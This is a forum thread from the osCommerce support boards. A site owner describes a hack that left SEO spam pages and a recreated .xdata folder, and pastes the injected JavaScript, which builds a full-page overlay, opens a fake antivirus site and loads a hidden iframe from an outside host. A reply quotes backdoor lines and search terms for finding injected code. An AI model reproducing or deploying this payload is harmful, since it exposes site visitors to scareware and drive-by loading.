Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

site hacked google warnings too...pls help


natashome

Recommended Posts

I wouldn't have noticed that my site was hacked if Google didn't sent me an email letting me know that he found some hidden keywords in my pages and it breaks their rules and some pages were taken of the index.

I took a look at my FTP and in that particular domain indeed there were some extra files like this:

 

1. a folder named .xdata which contained at least 300 html files with weird names like: 790-sports-animal.com.html; 2010-heisman-odds.html; agua-bella.html and so on. These html files contained urls and keywords

2. a file named Iog.php which contained the following code:

 

document.write('<div style="position: absolute; top: 0; left: 0; width: 100%;  height: 4000px;  background-color: #FFFFFF; padding: 0px">');
function go()
{
window.open("http://antyvirusservicenow.com/hitin.php?land=20&affid=34100");
}
document.write('<center><table align=center cellpadding=0 cellspacing=0 style="border: 0px solid; border-color: #000000; width: 400px; height: 300px; padding: 30px; margin-top: 100px; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: #000000;"><tr><td><br><br><br><br><br><br><br><br><br><br><center><input type=submit name=klik id=klik value="-=ENTER=-"  onclick="go();" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 40px; color: red; font-weight: bold; width: 300px; height: 60px; border: 2px solid; cursor: pointer"></center></td></tr></table></center></font></div><iframe src="http://levitt-tupa-wkolota.freehostia.com/k.html" width="1" height="1"></iframe>');

 

3. a logs file which again has a lot of links and keywords

 

I deleted these 2 files and folder but they are created every time. I also changed the .xdata folder permissions to 444 but it still changes itself to 777.

 

I couldn't find those keywords hidden in my pages at all.

 

Anyone has any clue?

 

Thanks

Link to comment
Share on other sites

Ask the host to wipe the site then restore from last known clean backup, often the only way to be sure its all gone.

 

Then add security http://www.oscommerce.com/forums/index.php?showtopic=313323

 

 

Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Link to comment
Share on other sites

Many times a hacker will hide a file somewhere deep within the site that can be used to restore his code so that may be what is happening. If they are being recreated after a time, it might be that the hacker is just getting back in. If youhad had the SiteMonitor addon installed (see My Addons), you would have known about this before google did. You should still install it and run the hacker test. It might help you locate such hidden files.

Support Links:

For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc.

All of My Addons

Get the latest versions of my addons

Recommended SEO Addons

Link to comment
Share on other sites

  • 8 months later...

We had the same problem. In our case it was a file called hit.php that was in the root of the site creating and altering folder permissions. For the xdata issue, do a search on your entire site for any of these entries:

 

/***********************\

| Private |

| Coding by nsh |

| mtDoor v.0.0.1 |

\***********************/

 

@mkdir("./.xdata");

@chmod("./.xdata", 0777);

 

We never were able to delete the xdata folder, but able to rename it and drop the permissions to 0444, after deleting the hit.php file.

 

Doing a site wise search for 'preg_replace', 'base64_decode','<iframe', and 'eval' revealed a TON of malicious code injected in many places even above oscommerce store folder level. Any code on a page above oscommerce comment intro on the page doesn't belong there.

 

Hope that info will be of help to someone.

 

 

I wouldn't have noticed that my site was hacked if Google didn't sent me an email letting me know that he found some hidden keywords in my pages and it breaks their rules and some pages were taken of the index.

I took a look at my FTP and in that particular domain indeed there were some extra files like this:

 

1. a folder named .xdata which contained at least 300 html files with weird names like: 790-sports-animal.com.html; 2010-heisman-odds.html; agua-bella.html and so on. These html files contained urls and keywords

2. a file named Iog.php which contained the following code:

 

document.write('<div style="position: absolute; top: 0; left: 0; width: 100%;  height: 4000px;  background-color: #FFFFFF; padding: 0px">');
function go()
{
window.open("http://antyvirusservicenow.com/hitin.php?land=20&affid=34100");
}
document.write('<center><table align=center cellpadding=0 cellspacing=0 style="border: 0px solid; border-color: #000000; width: 400px; height: 300px; padding: 30px; margin-top: 100px; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: #000000;"><tr><td><br><br><br><br><br><br><br><br><br><br><center><input type=submit name=klik id=klik value="-=ENTER=-"  onclick="go();" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 40px; color: red; font-weight: bold; width: 300px; height: 60px; border: 2px solid; cursor: pointer"></center></td></tr></table></center></font></div><iframe src="http://levitt-tupa-wkolota.freehostia.com/k.html" width="1" height="1"></iframe>');

 

3. a logs file which again has a lot of links and keywords

 

I deleted these 2 files and folder but they are created every time. I also changed the .xdata folder permissions to 444 but it still changes itself to 777.

 

I couldn't find those keywords hidden in my pages at all.

 

Anyone has any clue?

 

Thanks

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...